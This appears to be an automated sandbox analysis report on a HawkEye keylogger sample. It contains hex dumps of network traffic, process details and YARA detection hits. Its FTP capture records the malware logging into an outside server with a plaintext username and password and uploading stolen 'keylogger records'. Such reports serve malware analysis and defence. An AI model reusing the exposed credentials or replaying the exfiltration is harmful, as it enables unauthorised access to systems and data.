                                                                                                                                                      2022-03-11 10:56:40 UTC1INData Raw: 33 33 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                      Data Ascii: 339a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                      2022-03-11 10:56:40 UTC1INData Raw: 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 69 64 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63
                                                                                                                                                      Data Ascii: > ...<![endif]--><head><title>Please Wait... | Cloudflare</title> <meta name="captcha-bypass" id="captcha-bypass" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" c
                                                                                                                                                      2022-03-11 10:56:40 UTC2INData Raw: 46 50 57 76 3a 20 22 67 22 2c 0a 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 22 31 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 63 4c 74 3a 20 22 6e 22 2c 0a 20 20 20 20 20 20 20 20 63 52 71 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 72 75 3a 20 22 61 48 52 30 63 48 4d 36 4c 79 39 33 61 47 46 30 61 58 4e 74 65 57 6c 77 59 57 52 6b 63 6d 56 7a 63 79 35 6a 62 32 30 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 61 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 6d 3a 20 22 52 30 56 55 22 2c 0a 20 20 20 20 20 20 20 20 20 20 64 3a 20 22 56 62 30 77 4d 34 53 70 57 75 62 6c 54 4b 74 61 4c 51 45 7a 69 62 62 55 61 78 48 38 55 6a 6d 73 63 46 7a 6b 6e 72 77 56 69 4e 4c 44 45 67 42 6b 2b 31 34 32 44 4f 4e 77 36 38 73 75 6b 36 62 41 32 5a 71 6f 72 66 67 51 46
                                                                                                                                                      Data Ascii: FPWv: "g", cTTimeMs: "1000", cLt: "n", cRq: { ru: "aHR0cHM6Ly93aGF0aXNteWlwYWRkcmVzcy5jb20v", ra: "", rm: "R0VU", d: "Vb0wM4SpWublTKtaLQEzibbUaxH8UjmscFzknrwViNLDEgBk+142DONw68suk6bA2ZqorfgQF
                                                                                                                                                      2022-03-11 10:56:40 UTC4INData Raw: 74 6f 3b 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 66 2d 70 6c 65 61 73 65 2d 77 61 69 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 20 20 2e 61 74 74 72 69 62 75 74 69 6f 6e 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 32 70 78 3b 7d 0a 20 20 2e 62 75 62 62 6c 65 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 38 32 32 30 3b 20 77 69 64 74 68 3a 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 32 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a
                                                                                                                                                      Data Ascii: to;} #cf-wrapper #cf-please-wait{text-align:center} .attribution {margin-top: 32px;} .bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; } #cf-wrapper #challenge-form { padding-top:
                                                                                                                                                      2022-03-11 10:56:40 UTC5INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 20 63 66 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 68 69 67 68 6c 69 67 68 74 2d 69 6e 76 65 72 73 65 20 63 66 2d 66 6f 72 6d 2d 73 74 61 63 6b 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: class="cf-section cf-highlight cf-captcha-container"> <div class="cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <div class="cf-highlight-inverse cf-form-stacked">
                                                                                                                                                      2022-03-11 10:56:40 UTC6INData Raw: 36 47 57 31 36 4d 76 57 44 67 51 4c 56 74 59 54 66 72 65 4b 34 70 38 65 79 79 77 45 61 4f 4c 73 39 75 51 35 30 48 68 47 46 36 52 71 4f 6c 4e 43 71 48 41 48 44 4c 5f 58 39 53 4f 6c 5f 65 30 64 68 64 68 58 39 63 6c 32 73 32 30 52 71 79 42 39 68 71 6c 36 72 6b 38 36 72 59 39 68 61 30 31 6e 47 44 77 31 39 79 79 33 77 55 36 55 77 61 68 48 2d 48 54 42 54 4d 4b 62 65 33 31 56 77 71 4f 46 69 41 77 6f 54 54 45 6d 5a 44 79 50 46 54 6c 4d 62 36 64 64 52 4f 6f 6e 62 43 64 72 58 67 32 48 36 65 46 6a 6e 67 66 71 34 38 38 68 4f 5f 48 67 4d 77 69 56 2d 32 41 6d 51 34 7a 69 35 42 55 67 44 6c 69 64 6d 6d 37 59 47 56 79 46 58 6c 4f 6f 68 75 66 34 4e 35 45 6e 7a 72 38 57 36 71 58 6d 46 65 71 73 49 6c 68 61 59 38 39 73 50 4e 39 35 55 74 59 74 57 6c 5f 5a 33 56 32 32 37 62 79
                                                                                                                                                      Data Ascii: 6GW16MvWDgQLVtYTfreK4p8eyywEaOLs9uQ50HhGF6RqOlNCqHAHDL_X9SOl_e0dhdhX9cl2s20RqyB9hql6rk86rY9ha01nGDw19yy3wU6UwahH-HTBTMKbe31VwqOFiAwoTTEmZDyPFTlMb6ddROonbCdrXg2H6eFjngfq488hO_HgMwiV-2AmQ4zi5BUgDlidmm7YGVyFXlOohuf4N5Enzr8W6qXmFeqsIlhaY89sPN95UtYtWl_Z3V227by
                                                                                                                                                      2022-03-11 10:56:40 UTC8INData Raw: 4d 72 56 43 45 6a 77 67 74 47 37 33 4f 71 31 45 59 55 6b 70 69 74 61 52 35 37 74 41 65 2b 52 39 69 2b 4a 36 6a 47 74 5a 78 63 34 48 72 66 5a 6f 77 78 38 69 49 59 4e 4b 59 57 66 78 65 2f 68 63 70 32 34 41 35 4e 42 41 53 4f 67 4f 5a 49 61 4f 2f 76 4f 2f 42 70 64 5a 62 4c 51 36 78 78 45 68 49 62 34 45 6c 6a 73 53 76 78 50 79 2b 6f 41 57 68 6a 43 4b 74 6c 4c 31 70 78 30 49 67 6f 49 53 2f 47 7a 43 78 4d 61 67 45 50 76 6d 78 56 6f 45 56 68 45 63 4a 77 6f 50 76 68 63 4f 55 30 4e 43 53 76 68 36 68 62 2b 47 47 48 35 47 71 6b 37 54 56 4a 35 63 6f 57 77 65 7a 55 4b 73 74 57 6a 79 33 59 59 52 48 79 57 70 74 6c 7a 4f 46 36 37 38 67 57 70 78 63 36 47 50 34 65 38 51 68 65 61 47 6b 54 30 77 35 69 4e 31 58 6e 5a 55 32 66 47 75 41 62 47 46 51 31 42 63 31 59 48 6a 44 46 31
                                                                                                                                                      Data Ascii: MrVCEjwgtG73Oq1EYUkpitaR57tAe+R9i+J6jGtZxc4HrfZowx8iIYNKYWfxe/hcp24A5NBASOgOZIaO/vO/BpdZbLQ6xxEhIb4EljsSvxPy+oAWhjCKtlL1px0IgoIS/GzCxMagEPvmxVoEVhEcJwoPvhcOU0NCSvh6hb+GGH5Gqk7TVJ5coWwezUKstWjy3YYRHyWptlzOF678gWpxc6GP4e8QheaGkT0w5iN1XnZU2fGuAbGFQ1Bc1YHjDF1
                                                                                                                                                      2022-03-11 10:56:40 UTC9INData Raw: 69 70 74 20 6f 6e 20 61 6e 64 20 72 65 6c 6f 61 64 20 74 68 65 20 70 61 67 65 2e 3c 2f 68 31 3e 0a 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6e 6f 2d 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 63 6c 61 73 73 3d 22 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 43 6f 6f 6b 69 65 73 20 61 6e 64 20 72 65 6c 6f 61 64 20
                                                                                                                                                      Data Ascii: ipt on and reload the page.</h1> </noscript> <div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none"> <p data-translate="turn_on_cookies" style="color:#bd2426;">Please enable Cookies and reload
                                                                                                                                                      2022-03-11 10:56:40 UTC10INData Raw: 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 72 6b 6a 73 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 6d 61 6e 61 67 65 64 2f 76 31 3f 72 61 79 3d 36 65 61 33 63 33 63 62 63 38 61 36 36 39 35 35 22 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61
                                                                                                                                                      Data Ascii: y.appendChild(trkjs); var cpo=document.createElement('script'); cpo.type='text/javascript'; cpo.src="/cdn-cgi/challenge-platform/h/g/orchestrate/managed/v1?ray=6ea3c3cbc8a66955"; window._cf_chl_opt.cOgUQuery = loca
                                                                                                                                                      2022-03-11 10:56:40 UTC12INData Raw: 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 64 6f 20 49 20 68 61 76 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 20 43 41 50 54 43 48 41 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 64 65 74 61 69 6c 22 3e 43 6f 6d 70 6c 65 74 69 6e 67 20 74 68 65 20 43
                                                                                                                                                      Data Ascii: apper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="why_captcha_headline">Why do I have to complete a CAPTCHA?</h2> <p data-translate="why_captcha_detail">Completing the C
                                                                                                                                                      2022-03-11 10:56:40 UTC13INData Raw: 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 59 6f 75 72 20 49 50 3c 2f 73 70 61 6e 3e 3a 20 38 34 2e 31 37 2e 35 32 2e 32 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61
                                                                                                                                                      Data Ascii: s="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 84.17.52.20</span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><spa
                                                                                                                                                      2022-03-11 10:56:40 UTC14INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      FTP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                      Mar 11, 2022 11:57:05.401681900 CET214978266.70.204.222192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                                                                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.
                                                                                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                                                      Mar 11, 2022 11:57:05.416121006 CET4978221192.168.2.466.70.204.222USER Elooggs2020@manchutimefashion.com
                                                                                                                                                      Mar 11, 2022 11:57:05.527828932 CET214978266.70.204.222192.168.2.4331 User Elooggs2020@manchutimefashion.com OK. Password required
                                                                                                                                                      Mar 11, 2022 11:57:05.528053999 CET4978221192.168.2.466.70.204.222PASS [r2W$.jaD*?p
                                                                                                                                                      Mar 11, 2022 11:57:05.654520988 CET214978266.70.204.222192.168.2.4230 OK. Current restricted directory is /
                                                                                                                                                      Mar 11, 2022 11:57:05.766429901 CET214978266.70.204.222192.168.2.4504 Unknown command
                                                                                                                                                      Mar 11, 2022 11:57:05.767116070 CET4978221192.168.2.466.70.204.222PWD
                                                                                                                                                      Mar 11, 2022 11:57:05.878653049 CET214978266.70.204.222192.168.2.4257 "/" is your current location
                                                                                                                                                      Mar 11, 2022 11:57:05.878947020 CET4978221192.168.2.466.70.204.222CWD /
                                                                                                                                                      Mar 11, 2022 11:57:05.990483999 CET214978266.70.204.222192.168.2.4250 OK. Current directory is /
                                                                                                                                                      Mar 11, 2022 11:57:05.990739107 CET4978221192.168.2.466.70.204.222TYPE I
                                                                                                                                                      Mar 11, 2022 11:57:06.102324009 CET214978266.70.204.222192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                                                      Mar 11, 2022 11:57:06.102615118 CET4978221192.168.2.466.70.204.222PASV
                                                                                                                                                      Mar 11, 2022 11:57:06.214400053 CET214978266.70.204.222192.168.2.4227 Entering Passive Mode (66,70,204,222,232,200)
                                                                                                                                                      Mar 11, 2022 11:57:06.388211966 CET4978221192.168.2.466.70.204.222STOR HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                                                                                                                                                      Mar 11, 2022 11:57:06.499972105 CET214978266.70.204.222192.168.2.4150 Accepted data connection
                                                                                                                                                      Mar 11, 2022 11:57:06.608611107 CET214978266.70.204.222192.168.2.4226-File successfully transferred
                                                                                                                                                      226-File successfully transferred226 0.109 seconds (measured here), 13.83 Kbytes per second

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:11:56:10
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\TGQfHfehsY.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:663994 bytes
                                                                                                                                                      MD5 hash:9B8EC9E094676D88B02F038F318AFD86
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:11:56:11
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:120320 bytes
                                                                                                                                                      MD5 hash:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:11:56:13
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:120320 bytes
                                                                                                                                                      MD5 hash:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.500849311.0000000007BF0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
